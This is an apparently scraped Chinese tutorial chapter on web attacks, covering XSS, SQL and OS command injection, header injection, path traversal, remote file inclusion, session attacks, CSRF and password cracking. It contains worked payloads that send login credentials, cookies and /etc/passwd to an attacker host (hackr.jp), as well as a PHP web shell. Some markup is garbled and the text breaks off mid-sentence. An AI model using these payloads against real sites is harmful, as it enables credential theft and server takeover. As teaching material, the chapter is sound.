互联网上的攻击大都将 Web 站点作为目标。本章讲解具体有哪些攻击 Web 站点的手段,以及攻击会造成怎样的影响。
简单的 HTTP 协议本身并不存在安全性问题,因此协议本身几乎不会成为攻击的对象。应用 HTTP 协议的服务器和客户端,以及运行在服务器上的 Web 应用等资源才是攻击目标。
目前,来自互联网的攻击大多是冲着 Web 站点来的,它们大多把Web 应用作为攻击目标。本章主要针对 Web 应用的攻击技术进行讲解。
与最初的设计相比,现今的 Web 网站应用的 HTTP 协议的使用方式已发生了翻天覆地的变化。几乎现今所有的 Web 网站都会使用会话(session)管理、加密处理等安全性方面的功能,而 HTTP 协议内并不具备这些功能。
从整体上看,HTTP 就是一个通用的单纯协议机制。因此它具备较多优势,但是在安全性方面则呈劣势。
就拿远程登录时会用到的 SSH 协议来说,SSH 具备协议级别的认证及会话管理等功能,HTTP 协议则没有。另外在架设 SSH 服务方面,任何人都可以轻易地创建安全等级高的服务,而 HTTP 即使已架设好服务器,但若想提供服务器基础上的 Web 应用,很多情况下都需要重新开发。
因此,开发者需要自行设计并开发认证及会话管理功能来满足 Web应用的安全。而自行设计就意味着会出现各种形形色色的实现。结果,安全等级并不完备,可仍在运作的 Web 应用背后却隐藏着各种容易被攻击者滥用的安全漏洞的 Bug。
在 Web 应用中,从浏览器那接收到的 HTTP 请求的全部内容,都可以在客户端自由地变更、篡改。所以 Web 应用可能会接收到与预期数据不相同的内容。
在 HTTP 请求报文内加载攻击代码,就能发起对 Web 应用的攻击。通过 URL查询字段或表单、HTTP 首部、Cookie 等途径把攻击代码传入,若这时 Web 应用存在安全漏洞,那内部信息就会遭到窃取,或被攻击者拿到管理权限。
对 Web 应用的攻击模式有以下两种。
主动攻击(active attack)是指攻击者通过直接访问 Web 应用,把攻击代码传入的攻击模式。由于该模式是直接针对服务器上的资源进行攻击,因此攻击者需要能够访问到那些资源。
主动攻击模式里具有代表性的攻击是 SQL注入攻击和 OS 命令注入攻击。
被动攻击模式中具有代表性的攻击是跨站脚本攻击和跨站点请求伪造。
利用用户的身份攻击企业内部网络
利用被动攻击,可发起对原本从互联网上无法直接访问的企业内网等网络的攻击。只要用户踏入攻击者预先设好的陷阱,在用户能够访问到的网络范围内,即使是企业内网也同样会受到攻击。
很多企业内网依然可以连接到互联网上,访问 Web 网站,或接收互联网发来的邮件。这样就可能给攻击者以可乘之机,诱导用户触发陷阱后对企业内网发动攻击。
实施 Web 应用的安全对策可大致分为以下两部分。
多数情况下采用 JavaScript 在客户端验证数据。可是在客户端允许篡改数据或关闭 JavaScript,不适合将 JavaScript 验证作为安全的防范对策。保留客户端验证只是为了尽早地辨识输入错误,起到提高 UI体验的作用。
Web 应用端的输入值验证按 Web 应用内的处理则有可能被误认为是具有攻击性意义的代码。输入值验证通常是指检查是否是符合系统业务逻辑的数值或检查字符编码等预防对策。
从数据库或文件系统、HTML、邮件等输出 Web 应用处理的数据之际,针对输出做值转义处理是一项至关重要的安全策略。当输出值转义不完全时,会因触发攻击者传入的攻击代码,而给输出对象带来损害。
跨站脚本攻击(Cross-Site Scripting,XSS) 是指通过存在安全漏洞的Web 网站注册用户的浏览器内运行非法的 HTML 标签或 JavaScript 进行的一种攻击。动态创建的 HTML部分有可能隐藏着安全漏洞。就这样,攻击者编写脚本设下陷阱,用户在自己的浏览器上运行时,不小心就会受到被动攻击。
跨站脚本攻击有可能造成以下影响。
http://example.jp/login?ID=">
var+f=document.getElementById(“login”);+f.ac
浏览器打开该 URI 后,直观感觉没有发生任何变化,但设置好的脚本却偷偷开始运行了。当用户在表单内输入 ID 和密码之后,就会直接发送到攻击者的网站(也就是 hackr.jp),导致个人登录信息被窃取。
之后,ID 及密码会传给该正规网站,而接下来仍然是按正常登录步骤,用户很难意识到自己的登录信息已遭泄露。
对 http://example.jp/login?ID=yama 请求时对应的 HTML源代码(摘录)
<div class="logo">
<img src="/img/logo.gif" alt="E! 拍卖会" />
</div>
<form action="http://example.jp/login" method="post" id="login">
<div class="input_id">
ID <input type="text" name="ID" value="yama" />
</div>
http://example.jp/login?ID=“>
var+f=document.getElementById(“login”);+f.action=“http://hackr.jp/pwget”;+f.method=“get”;
<div class="logo">
<img src="/img/logo.gif" alt="E! 拍卖会 />
</div>
<form action="http://example.jp/login" method="post" id="login">
<div class="input_id">
ID <input type="text" name="ID" value=""><script>var f=document.getElementById("login"); f.action="http://hackr.jp/pwget"; f.method="get";</script><span s="
</div>
<
script
src=http://hackr.jp/xss.js>script>
该脚本内指定的 http://hackr.jp/xss.js 文件。即下面这段采用JavaScript 编写的代码。
var content = escape(document.cookie);
document.write("
);
document.write(content);
document.write(">");
在存在可跨站脚本攻击安全漏洞的 Web 应用上执行上面这段JavaScript 程序,即可访问到该 Web 应用所处域名下的 Cookie 信息。然 后这些信息会发送至攻击者的 Web 网站(http://hackr.jp/),记录在他的登录日志中。结果,攻击者就这样窃取到用户的 Cookie 信息了。
何为 SQL
SQL是用来操作关系型数据库管理系统(Relational DataBase Management System,RDBMS)的数据库语言,可进行操作数据或定义数据等。RDBMS 中有名的数据库有 Oracle Database、Microsoft SQLServer、IBM DB2、MySQL和 PostgreSQL等。这些数据库系统都可以把 SQL作为数据库语言使用。使用数据库的 Web 应用,通过某种方法将 SQL语句传给RDBMS,再把 RDBMS 返回的结果灵活地使用在 Web 应用中。
SELECT title,text FROM newsTbl WHERE id=123
SELECT * FROM bookTbl WHERE author = ‘上野宣’ and flag = 1;
该 SQL语句表示“从 bookTbl 表中,显示满足 author= 上野宣 and flag=1(可售)所在行的数据”。
数据库内的 bookTbl 表记录着该购物网站的所有书籍信息。通过SQL语句,将满足作者名(author)上野宣并且 flag 为 1 双重条件的条目取出,最后作为搜索结果显示出来。
图:数据库处理
SQL 注入攻击的操作示例
把刚才指定查询字段的上野宣改写成“上野宣’–”。
构成的 SQL语句就变成“从数据库的 bookTbl 表中,显示满足author= 上野宣条件所在行的数据”,如下所示。
SELECT * FROM bookTbl WHERE author =‘上野宣’ - -’ and flag=1;
SQL语句中的 – 之后全视为注释。即,and flag=1 这个条件被自动忽略了。
结果跟 flag 的设定值无关,只取出满足 author=“上野宣”条件所在行的数据,这样连那些尚未出版的书籍也一并显示出来了。
OS 命令注入攻击(OS Command Injection)是指通过 Web 应用,执行非法的操作系统命令达到攻击的目的。只要在能调用 Shell 函数的地方就有存在被攻击的风险。
可以从 Web 应用中通过 Shell 来调用操作系统命令。倘若调用 Shell时存在疏漏,就可以执行插入的非法 OS 命令。
OS 命令注入攻击可以向 Shell 发送命令,让 Windows 或 Linux 操作系统的命令行启动程序。也就是说,通过 OS 注入攻击可执行 OS 上安装着的各种程序。
my $adr = $q->param('mailaddress');
open(MAIL, "| /usr/sbin/sendmail $adr");
print MAIL "From: [email protected]\n";
程序中的 open 函数会调用 sendmail 命令发送邮件,而指定的邮件发送地址即 $adr 的值。
攻击者将下面的值指定作为邮件地址。
; cat /etc/passwd | mail [email protected]
程序接收该值,构成以下的命令组合。
| /usr/sbin/sendmail ; cat /etc/passwd | mail [email protected]
攻击者的输入值中含有分号(;)。这个符号在 OS 命令中,会被解析为分隔多个执行命令的标记。
可见,sendmail 命令执行被分隔后,接下去就会执行 cat/etc/passwd | mail [email protected] 这样的命令了。结果,含有Linux 账户信息 /etc/passwd 的文件,就以邮件形式发送给了[email protected]。
HTTP 首部注入攻击(HTTP Header Injection)是指攻击者通过在响应首部字段内插入换行,添加任意响应首部或主体的一种攻击。属于被动攻击模式。
向首部主体内添加内容的攻击称为 HTTP 响应截断攻击(HTTP Response Splitting Attack)。
如下所示,Web 应用有时会把从外部接收到的数值,赋给响应首部字段 Location 和 Set-Cookie。
Location: http://www.example.com/a.cgi?q=12345
Set-Cookie: UID=12345
*12345就是插入值
HTTP 首部注入可能像这样,通过在某些响应首部字段需要处理输出值的地方,插入换行发动攻击。
HTTP 首部注入攻击有可能会造成以下一些影响。
101%0D%0ASet-Cookie:+SID=123456789
其中,%0D%0A 代表 HTTP 报文中的换行符,紧接着的是可强制将攻击者网站(http://hackr.jp/)的会话 ID 设置成SID=123456789 的 Set-Cookie 首部字段。
发送该请求之后,假设结果返回以下响应。
Location: http://example.com/?cat=101(%0D%0A :换行符)Set-Cookie: SID=123456789
此刻,首部字段 Set-Cookie 已生效,因此攻击者可指定修改任意的 Cookie 信息。通过和会话固定攻击(攻击者可使用指定的会话 ID)攻击组合,攻击者可伪装成用户。
攻击者输入的 %0D%0A,原本应该属于首部字段 Location 的查询值部分,但经过解析后,%0D%0A 变成了换行符,结果插入了新的首部字段。
这样一来,攻击者可在响应中插入任意的首部字段。
%0D%0A%0D%0A
</code>之后,想要显示的网页内容 <!–</p> </blockquote> <p>在可能进行 HTTP 首部注入的环节,通过发送上面的字符串,返回结果得到以下这种响应。</p> <pre><code class="prism language-dart"><span class="token class-name">Set</span><span class="token operator">-</span><span class="token class-name">Cookie</span><span class="token punctuation">:</span> UID<span class="token operator">=</span>(<span class="token operator">%</span><span class="token number">0</span>D<span class="token operator">%</span><span class="token number">0</span>A :换行符) (<span class="token operator">%</span><span class="token number">0</span>D<span class="token operator">%</span><span class="token number">0</span>A :换行符) <span class="token generics"><span class="token punctuation"><</span>HTML<span class="token punctuation">></span></span><span class="token generics"><span class="token punctuation"><</span>HEAD<span class="token punctuation">></span></span><span class="token generics"><span class="token punctuation"><</span>TITLE<span class="token punctuation">></span></span>之后,想要显示的网页内容 <span class="token operator"><</span><span class="token operator">!</span><span class="token operator">--</span>(原来页面对应的首部 </code></pre> <p>利用这个攻击,已触发陷阱的用户浏览器会显示伪造的 Web 页面,再让用户输入自己的个人信息等,可达到和跨站脚本攻击相同的效果。<br> 另外,滥用 HTTP/1.1 中汇集多响应返回功能,会导致缓存服务器对任意内容进行缓存操作。这种攻击称为缓存污染。使用该缓存服务器的用户,在浏览遭受攻击的网站时,会不断地浏览被替换掉的 Web 网页。</p> <h2>5、邮件首部注入攻击</h2> <p>邮件首部注入(Mail Header Injection)是指 Web 应用中的邮件发送功能,攻击者通过向邮件首部 To 或 Subject 内任意添加非法内容发起的攻击。利用存在安全漏洞的 Web 网站,可对任意邮件地址发送广告邮件或病毒邮件。</p> <ul> <li>邮件首部注入攻击案例<br> 下面以 Web 页面中的咨询表单为例讲解邮件首部注入攻击。该功能可在表单内填入咨询者的邮件地址及咨询内容后,以邮件的形式发送给网站管理员。<br> <a href="http://img.e-com-net.com/image/info8/9053e8b5fa4a48f6ad837791fea6b592.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/9053e8b5fa4a48f6ad837791fea6b592.jpg" alt="HTTP——十一、Web的攻击技术_第21张图片" width="475" height="301" style="border:1px solid black;"></a><br> 攻击者将以下数据作为邮件地址发起请求。</li> </ul> <blockquote> <p>bob@hackr.jp%0D%0ABcc: user@example.com</p> </blockquote> <p>%0D%0A 在邮件报文中代表换行符。一旦咨询表单所在的 Web应用接收了这个换行符,就可能实现对 Bcc 邮件地址的追加发送,而这原本是无法指定的。<br> 另外像下面一样,使用两个连续的换行符就有可能篡改邮件文本内容并发送。</p> <blockquote> <p>bob@hackr.jp%0D%0A%0D%0ATest Message</p> </blockquote> <p>再以相同的方法,就有可能改写 To 和 Subject 等任意邮件首部,或向文本添加附件等动作。</p> <h2>6、目录遍历攻击</h2> <p>目录遍历 (Directory Traversal) 攻击是指对本无意公开的文件目录通过非法截断其目录路径后,达成访问目的的一种攻击。这种攻击有时也称为路径遍历 (Path Traversal) 攻击。<br> 通过 Web 应用对文件处理操作时,在由外部指定文件名的处理存在疏漏的情况下,用户可使用 …/ 等相对路径定位到 /etc/passed 等绝对路径上,因此服务器上任意的文件或文件目录皆有可能被访问到。这样一来,就有可能非法浏览、篡改或删除 Web 服务器上的文件。<br> 固然存在输出值转义的问题,但更应该关闭指定对任意文件名的访问权限。</p> <ul> <li>目录遍历攻击案例<br> 下面以显示读取文件功能为例,讲解目录遍历攻击。该功能通过以下查询字段,指定某个文件名。然后从 /www/log/ 文件目录下读取这个指定的文件。</li> </ul> <blockquote> <p>http://example.com/read.php?log=0401.log</p> </blockquote> <p>攻击者设置如下查询字段后发出请求。</p> <blockquote> <p>http://example.com/read.php?log=…/…/etc/passwd</p> </blockquote> <p>查询字段为了读取攻击者盯上的 /etc/passwd 文件,会从<br> /www/log/ 目录开始定位相对路径。如果这份 read.php 脚本接受对指定目录的访问请求处理,那原本不公开的文件就存在可被访问的风险。<br> <a href="http://img.e-com-net.com/image/info8/58466e14cfac4fa5af24113fc8646379.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/58466e14cfac4fa5af24113fc8646379.jpg" alt="HTTP——十一、Web的攻击技术_第22张图片" width="536" height="304" style="border:1px solid black;"></a></p> <h2>7、远程文件包含漏洞</h2> <p>远程文件包含漏洞(Remote File Inclusion) 是指当部分脚本内容需要从其他文件读入时,攻击者利用指定外部服务器的 URL充当依赖文件,让脚本读取之后,就可运行任意脚本的一种攻击。<br> 这主要是 PHP 存在的安全漏洞,对 PHP 的 include 或 require 来说这是一种可通过设定,指定外部服务器的 URL作为文件名的功能。但是,该功能太危险,PHP5.2.0 之后默认设定此功能无效。<br> 固然存在输出值转义的问题,但更应控制对任意文件名的指定。</p> <ul> <li>远程文件包含漏洞的攻击案例<br> 下面以 include 读入由查询字段指定文件的功能为例,讲解远程文件包含漏洞。该功能可通过以下查询字段形式指定文件名,并在脚本内的 include 语句处读入这个指定文件。</li> </ul> <pre><code class="prism language-dart">http<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>example<span class="token punctuation">.</span>com<span class="token operator">/</span>foo<span class="token punctuation">.</span>php<span class="token operator">?</span>mod<span class="token operator">=</span>news<span class="token punctuation">.</span>php </code></pre> <p>对应脚本的源代码如下所示。</p> <blockquote> <p>http://example.com/foo.php 的源代码(部分摘录)</p> </blockquote> <pre><code class="prism language-dart">$modname <span class="token operator">=</span> $_GET<span class="token punctuation">[</span><span class="token string-literal"><span class="token string">'mod'</span></span><span class="token punctuation">]</span><span class="token punctuation">;</span> <span class="token function">include</span><span class="token punctuation">(</span>$modname<span class="token punctuation">)</span><span class="token punctuation">;</span> </code></pre> <p>攻击者指定如同下面形式的 URL发出请求。</p> <blockquote> <p>http://example.com/foo.php?mod=http://hackr.jp/cmd.php&cmd=ls</p> </blockquote> <p>攻击者已事先在外部服务器上准备了以下这段脚本。</p> <pre><code class="prism language-dart">http<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>hackr<span class="token punctuation">.</span>jp<span class="token operator">/</span>cmd<span class="token punctuation">.</span>php 的源代码 <span class="token operator"><</span><span class="token operator">?</span> <span class="token function">system</span><span class="token punctuation">(</span>$_GET<span class="token punctuation">[</span><span class="token string-literal"><span class="token string">'cmd'</span></span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token operator">?</span><span class="token operator">></span> </code></pre> <p>假设 Web 服务器(example.com)的 include 可以引入外部服务器的 URL,那就会读入攻击者在外部服务器上事先准备的URL(http://hackr.jp/cmd.php)。结果,通过 system 函数就能在Web 服务器(example.com)上执行查询字段指定的 OS 命令了。<br> <a href="http://img.e-com-net.com/image/info8/554f65e917b04c7fb5c14250e3c8323d.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/554f65e917b04c7fb5c14250e3c8323d.jpg" alt="HTTP——十一、Web的攻击技术_第23张图片" width="566" height="356" style="border:1px solid black;"></a><br> 在以上攻击案例中,执行了可显示 Web 服务器(example.com)上文件及目录信息的 ls 命令。</p> <h1>三、因设置或设计上的缺陷引发的安全漏洞</h1> <p>因设置或设计上的缺陷引发的安全漏洞是指,错误设置 Web 服务器,或是由设计上的一些问题引起的安全漏洞。</p> <h2>1、强制浏览</h2> <p>强制浏览(Forced Browsing)安全漏洞是指,从安置在 Web 服务器的公开目录下的文件中,浏览那些原本非自愿公开的文件。<br> 强制浏览有可能会造成以下一些影响。</p> <ul> <li>泄露顾客的个人信息等重要情报</li> <li>泄露原本需要具有访问权限的用户才可查阅的信息内容</li> <li>泄露未外连到外界的文件</li> </ul> <p>对那些原本不愿公开的文件,为了保证安全会隐蔽其 URL。可一旦知道了那些 URL,也就意味着可浏览 URL对应的文件。直接显示容易推测的文件名或文件目录索引时,通过某些方法可能会使 URL产生泄露。<br> 文件目录一览</p> <pre><code class="prism language-dart">http<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>www<span class="token punctuation">.</span>example<span class="token punctuation">.</span>com<span class="token operator">/</span>log<span class="token operator">/</span> </code></pre> <p>通过指定文件目录名称,即可在文件一览中看到显示的文件名。<br> 容易被推测的文件名及目录名</p> <pre><code class="prism language-dart">http<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>www<span class="token punctuation">.</span>example<span class="token punctuation">.</span>com<span class="token operator">/</span>entry<span class="token operator">/</span>entry_081202<span class="token punctuation">.</span>log </code></pre> <p>文件名称容易推测(按上面的情况,可推出下一个文件是entry_081203.log)<br> 备份文件</p> <pre><code class="prism language-dart">http<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>www<span class="token punctuation">.</span>example<span class="token punctuation">.</span>com<span class="token operator">/</span>cgi<span class="token operator">-</span>bin<span class="token operator">/</span>entry<span class="token punctuation">.</span>cgi(原始文件) http<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>www<span class="token punctuation">.</span>example<span class="token punctuation">.</span>com<span class="token operator">/</span>cgi<span class="token operator">-</span>bin<span class="token operator">/</span>entry<span class="token punctuation">.</span>cgi<span class="token operator">~</span>(备份文件) http<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>www<span class="token punctuation">.</span>example<span class="token punctuation">.</span>com<span class="token operator">/</span>cgi<span class="token operator">-</span>bin<span class="token operator">/</span>entry<span class="token punctuation">.</span>bak(备份文件) </code></pre> <p>由编辑软件自动生成的备份文件无执行权限,有可能直接以源代码形式显示<br> 经认证才可显示的文件<br> 直接通过 URL访问原本必须经过认证才能在 Web 页面上使用的文件<br> (HTML文件、图片、PDF 等文档、CSS 以及其他数据等)</p> <ul> <li>强制浏览导致安全漏洞的案例</li> </ul> <p>下面我们以会员制度的 SNS 日记功能为例,讲解强制浏览可能导致的安全漏洞。该日记功能保证了除具有访问权限的用户本人以外,其他人都不能访问日记。<br> <a href="http://img.e-com-net.com/image/info8/f2876f4f76824267b3d2c94f5e7728cd.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/f2876f4f76824267b3d2c94f5e7728cd.jpg" alt="HTTP——十一、Web的攻击技术_第24张图片" width="650" height="325" style="border:1px solid black;"></a><br> 该日记中包含的图像照片的源代码如下所示。</p> <blockquote> <p><code><img src="http://example.com/img/tRNqSUBdG7Da.jpg"></code></p> </blockquote> <p>即使没有对这篇日记的访问权限,只要知道这图片的 URL,通过直接指定 URL的方式就能显示该图片。日记的功能和文本具有访问对象的控制,但不具备对图片访问对象的控制,从而产生了安全漏洞。</p> <h2>2、不正确的错误消息处理</h2> <p>不正确的错误消息处理(Error Handling Vulnerability)的安全漏洞是指,Web 应用的错误信息内包含对攻击者有用的信息。与 Web 应用有关的主要错误信息如下所示。</p> <ul> <li>Web 应用抛出的错误消息</li> <li>数据库等系统抛出的错误消息</li> </ul> <p>Web 应用不必在用户的浏览画面上展现详细的错误消息。对攻击者来说,详细的错误消息有可能给他们下一次攻击以提示。</p> <ul> <li>不正确的错误消息处理导致安全漏洞的案例<br> Web 应用抛出的错误消息<br> 下面以认证功能的认证错误消息为例,讲解不正确的错误消息处理方式。该认证功能,在输入表单内的邮件地址及密码匹配发生错误时,会提示错误信息。<br> <a href="http://img.e-com-net.com/image/info8/c74f703aee2445ae9c508ee4959e6512.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/c74f703aee2445ae9c508ee4959e6512.jpg" alt="HTTP——十一、Web的攻击技术_第25张图片" width="505" height="406" style="border:1px solid black;"></a><br> 上方画面提示“邮件地址未注册”的错误消息。当输入的邮件地址尚未在该 Web 网站上注册时,就会触发这条错误消息。因为倘若邮件地址存在,应该会提示“输入的密码有误”之类的错误消息。<br> 攻击者利用进行不同的输入会提示不同的错误信息这条,就可用来确认输入的邮件地址是否已在这个 Web 网站上注册过了。<br> 为了不让错误消息给攻击者以启发,建议将提示消息的内容仅保留到“认证错误”这种程度即可。<br> 数据库等系统抛出的错误消息<br> 下面我们以搜索功能提示的错误信息为例,讲解不正确的错误消息处理。本功能用于检索数据,当输入未预料的字符串时,会提示数据库的错误。<br> 下面以认证功能的认证错误消息为例,讲解不正确的错误消息处理。该认证功能在输入表单内的邮件地址及密码匹配发生错误时,会提示错误信息。<br> <a href="http://img.e-com-net.com/image/info8/c68e86ada88c4a0db2912727856f20c6.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/c68e86ada88c4a0db2912727856f20c6.jpg" alt="HTTP——十一、Web的攻击技术_第26张图片" width="541" height="329" style="border:1px solid black;"></a><br> 上方的画面中显示了与 SQL有关的错误信息。对开发者而言,该信息或许在 Debug 时会有帮助,但对用户毫无用处。<br> 攻击者从这条消息中可读出数据库选用的是 MySQL,甚至还看见了 SQL语句的片段。这可能给攻击者进行 SQL注入攻击以启发。<br> 系统抛出的错误主要集中在以下几个方面。</li> <li> <ul> <li>PHP 或 ASP 等脚本错误</li> </ul> </li> <li> <ul> <li>数据库或中间件的错误</li> </ul> </li> <li> <ul> <li>Web 服务器的错误</li> </ul> </li> </ul> <p>各系统应对详细的错误消息进行抑制设定,或使用自定义错误消息,以避免某些错误信息给攻击者以启发。</p> <h2>3、开放重定向</h2> <p>开放重定向(Open Redirect)是一种对指定的任意 URL作重定向跳转的功能。而于此功能相关联的安全漏洞是指,假如指定的重定向 URL到某个具有恶意的 Web 网站,那么用户就会被诱导至那个 Web 网站。</p> <ul> <li>开放重定向的攻击案例<br> 我们以下面的 URL做重定向为例,讲解开放重定向攻击案例。该功能就是向 URL指定参数后,使本来的 URL发生重定向跳<br> 转。</li> </ul> <blockquote> <p>http://example.com/?redirect=http://www.tricorder.jp</p> </blockquote> <p>攻击者把重定向指定的参数改写成已设好陷阱的 Web 网站对应的连接,如下所示。</p> <blockquote> <p>http://example.com/?redirect=http://hackr.jp</p> </blockquote> <p>用户看到 URL后原以为访问 example.com,不料实际上被诱导至hackr.jp 这个指定的重定向目标。<br> 可信度高的 Web 网站如果开放重定向功能,则很有可能被攻击者选中并用来作为钓鱼攻击的跳板。</p> <h1>四、因会话管理疏忽引发的安全漏洞</h1> <p>会话管理是用来管理用户状态的必备功能,但是如果在会话管理上有所疏忽,就会导致用户的认证状态被窃取等后果。</p> <h2>1、会话劫持</h2> <p>会话劫持(Session Hijack)是指攻击者通过某种手段拿到了用户的会话 ID,并非法使用此会话 ID 伪装成用户,达到攻击的目的。<br> <a href="http://img.e-com-net.com/image/info8/c67ba493c7e0459587dc5a5551a0dfcf.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/c67ba493c7e0459587dc5a5551a0dfcf.jpg" alt="HTTP——十一、Web的攻击技术_第27张图片" width="650" height="405" style="border:1px solid black;"></a><br> 具备认证功能的 Web 应用,使用会话 ID 的会话管理机制,作为管理认证状态的主流方式。会话 ID 中记录客户端的 Cookie 等信息,服务器端将会话 ID 与认证状态进行一对一匹配管理。<br> 下面列举了几种攻击者可获得会话 ID 的途径。</p> <ul> <li>通过非正规的生成方法推测会话 ID</li> <li>通过窃听或 XSS 攻击盗取会话 ID</li> <li>通过会话固定攻击(Session Fixation)强行获取会话 ID</li> <li>会话劫持攻击案例</li> </ul> <p>下面我们以认证功能为例讲解会话劫持。这里的认证功能通过会话管理机制,会将成功认证的用户的会话 ID(SID)保存在用户浏览器的 Cookie 中。<br> <a href="http://img.e-com-net.com/image/info8/f5d1769af8264d848b864261d539a382.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/f5d1769af8264d848b864261d539a382.jpg" alt="HTTP——十一、Web的攻击技术_第28张图片" width="634" height="434" style="border:1px solid black;"></a><br> 攻击者在得知该 Web 网站存在可跨站攻击(XSS)的安全漏洞后,就设置好用 JavaScript 脚本调用 document.cookie 以窃取Cookie 信息的陷阱,一旦用户踏入陷阱(访问了该脚本),攻击者就能获取含有会话 ID 的 Cookie。<br> 攻击者拿到用户的会话 ID 后,往自己的浏览器的 Cookie 中设置该会话 ID,即可伪装成会话 ID 遭窃的用户,访问 Web 网站了。</p> <h2>2、会话固定攻击</h2> <p>对以窃取目标会话 ID 为主动攻击手段的会话劫持而言,会话固定攻击(Session Fixation)攻击会强制用户使用攻击者指定的会话 ID,属于被动攻击。</p> <ul> <li>会话固定攻击案例<br> 下面我们以认证功能为例讲解会话固定攻击。这个 Web 网站的认证功能,会在认证前发布一个会话 ID,若认证成功,就会在服务器内改变认证状态。<br> <a href="http://img.e-com-net.com/image/info8/03c55dacb6684a3e8055a7e09f763684.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/03c55dacb6684a3e8055a7e09f763684.jpg" alt="HTTP——十一、Web的攻击技术_第29张图片" width="645" height="418" style="border:1px solid black;"></a><br> 攻击者准备陷阱,先访问 Web 网站拿到会话<br> ID(SID=f5d1278e8109)。此刻,会话 ID 在服务器上的记录仍是(未认证)状态。(步骤① ~ ②)<br> 攻击者设置好强制用户使用该会话 ID 的陷阱,并等待用户拿着这个会话 ID 前去认证。一旦用户触发陷阱并完成认证,会话ID(SID=f5d1278e8109)在服务器上的状态(用户 A 已认证)就会被记录下来。(步骤③)<br> 攻击者估计用户差不多已触发陷阱后,再利用之前这个会话 ID访问网站。由于该会话 ID 目前已是(用户 A 已认证)状态,于是攻击者作为用户 A 的身份顺利登录网站。(步骤④)<br> <strong>Session Adoption</strong><br> Session Adoption 是指 PHP 或 ASP.NET 能够接收处理未知会话 ID的功能。<br> 恶意使用该功能便可跳过会话固定攻击的准备阶段,从 Web 网站获得发行的会话 ID 的步骤。即,攻击者可私自创建会话 ID构成陷阱,中间件却会误以为该会话 ID 是未知会话 ID 而接受。</li> </ul> <h2>3、跨站点请求伪造</h2> <p>跨站点请求伪造(Cross-Site Request Forgeries,CSRF)攻击是指攻击者通过设置好的陷阱,强制对已完成认证的用户进行非预期的个人信息或设定信息等某些状态更新,属于被动攻击。<br> 跨站点请求伪造有可能会造成以下等影响。</p> <ul> <li>利用已通过认证的用户权限更新设定信息等</li> <li>利用已通过认证的用户权限购买商品</li> <li>利用已通过认证的用户权限在留言板上发表言论</li> <li>跨站点请求伪造的攻击案例<br> 下面以留言板功能为例,讲解跨站点请求伪造。该功能只允许已认证并登录的用户在留言板上发表内容。<br> <a href="http://img.e-com-net.com/image/info8/8ca1b6e8c0db452a870d8152ac93ff57.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/8ca1b6e8c0db452a870d8152ac93ff57.jpg" alt="HTTP——十一、Web的攻击技术_第30张图片" width="635" height="486" style="border:1px solid black;"></a><br> 在该留言板系统上,受害者用户 A 是已认证状态。它的浏览器中的 Cookie 持有已认证的会话 ID(步骤①)。<br> 攻击者设置好一旦用户访问,即会发送在留言板上发表非主观行为产生的评论的请求的陷阱。用户 A 的浏览器执行完陷阱中的请求后,留言板上也就会留下那条评论(步骤②)。<br> 触发陷阱之际,如果用户 A 尚未通过认证,则无法利用用户 A的身份权限在留言板上发表内容。</li> </ul> <h1>五、其他安全漏洞</h1> <h2>1、密码破解</h2> <p>密码破解攻击(Password Cracking)即算出密码,突破认证。攻击不仅限于 Web 应用,还包括其他的系统(如 FTP 或 SSH 等),本节将会讲解对具备认证功能的 Web 应用进行的密码破解。<br> 密码破解有以下两种手段。</p> <ul> <li>通过网络的密码试错</li> <li>对已加密密码的破解(指攻击者入侵系统,已获得加密或散列处理的密码数据的情况)</li> </ul> <p>除去突破认证的攻击手段,还有 SQL注入攻击逃避认证,跨站脚本攻击窃取密码信息等方法。</p> <ul> <li>通过网络进行密码试错<br> 对 Web 应用提供的认证功能,通过网络尝试候选密码进行的一种攻击。主要有以下两种方式。</li> <li> <ul> <li>穷举法</li> </ul> </li> <li> <ul> <li>字典攻击</li> </ul> </li> </ul> <p><strong>穷举法</strong><br> 穷举法(Brute-force Attack,又称暴力破解法)是指对所有密钥集合构成的密钥空间(Keyspace)进行穷举。即,用所有可行的候选密码对目标的密码系统试错,用以突破验证的一种攻击。<br> 比如银行采用的个人识别码是由“4 位数字”组成的密码,那么就要从 0000~9999 中的全部数字逐个进行尝试。这样一来,必定在候选的密码集合中存在一个正确的密码,可通过认证。<br> 因为穷举法会尝试所有的候选密码,所以是一种必然能够破解密码的攻击。但是,当密钥空间很庞大时,解密可能需要花费数年,甚至千年的时间,因此从现实角度考量,攻击是失败的。<br> <strong>字典攻击</strong><br> 字典攻击是指利用事先收集好的候选密码(经过各种组合方式后存入字典),枚举字典中的密码,尝试通过认证的一种攻击手法。<br> 还是举银行采用个人识别码是“4 位数字”的密码的例子,考虑到用户使用自己的生日做密码的可能性较高,于是就可以把生日日期数值化,如将 0101~1231 保存成字典,进行尝试。<br> 与穷举法相比,由于需要尝试的候选密码较少,意味着攻击耗费的时间比较短。但是,如果字典中没有正确的密码,那就无法破解成功。因此攻击的成败取决于字典的内容。<br> <a href="http://img.e-com-net.com/image/info8/cb6d387724bb453a9d373a431a080653.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/cb6d387724bb453a9d373a431a080653.jpg" alt="HTTP——十一、Web的攻击技术_第31张图片" width="639" height="501" style="border:1px solid black;"></a></p> <blockquote> <p>利用别处泄露的 ID·密码进行攻击<br> 字典攻击中有一种利用其他 Web 网站已泄露的 ID 及密码列表进行的攻击。很多用户习惯随意地在多个 Web 网站使用同一套 ID 及密码,因此攻击会有相当高的成功几率1。<br> 根据警方的调查统计,成功入侵率有 6.7%。平成 23 年(2011 